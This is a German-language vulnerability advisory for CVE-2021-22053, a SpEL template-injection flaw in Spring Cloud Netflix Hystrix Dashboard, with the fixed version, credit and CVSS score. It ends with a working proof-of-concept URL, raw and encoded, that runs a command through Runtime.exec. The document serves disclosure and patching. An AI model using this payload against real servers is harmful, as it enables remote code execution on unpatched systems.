
Schwachstelle bei der Template-Auflösung des Spring Cloud Netflix Hystrix Dashboards CVE-2021-22053
Hoch
Spring by VMware
Anwendungen, die sowohl spring-cloud-netflix-hystrix-dashboard als auch spring-boot-starter-thymeleaf verwenden, bieten eine Möglichkeit, Code auszuführen, der während der Auflösung von View-Templates im URI-Pfad der Anfrage übermittelt wird. Wenn eine Anfrage an /hystrix/monitor;[user-provided data] gestellt wird, werden die Pfadelemente nach hystrix/monitor als SpringEL-Ausdrücke ausgewertet, was zu Codeausführung führen kann.
Der Schweregrad ist hoch, sofern nicht anders angegeben.
Benutzer betroffener Versionen sollten die folgende Gegenmaßnahme anwenden: Benutzer sollten auf 2.2.10.RELEASE+ aktualisieren. Weitere Schritte sind nicht erforderlich. Zu den Versionen, die dieses Problem behoben haben, gehören:
Diese Schwachstelle wurde von threedr3am vom SecCoder Security Lab identifiziert und verantwortungsbewusst gemeldet ([email protected]).
https://www.first.org/cvss/calculator/3.0#CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L
2021-11-17: Erster Schwachstellenbericht veröffentlicht.
roh:
http://127.0.0.1:8080/hystrix/;a=a/__${T (java.lang.Runtime).getRuntime().exec("open -a calculator")}__::.x/
kodiert:
http://127.0.0.1:8080/hystrix/;a=a/__$%7BT%20(java.lang.Runtime).getRuntime().exec(%22open%20-a%20calculator%22)%7D__::.x/
PS. Der Schrägstrich '/' kann im Befehl nicht mitgeführt werden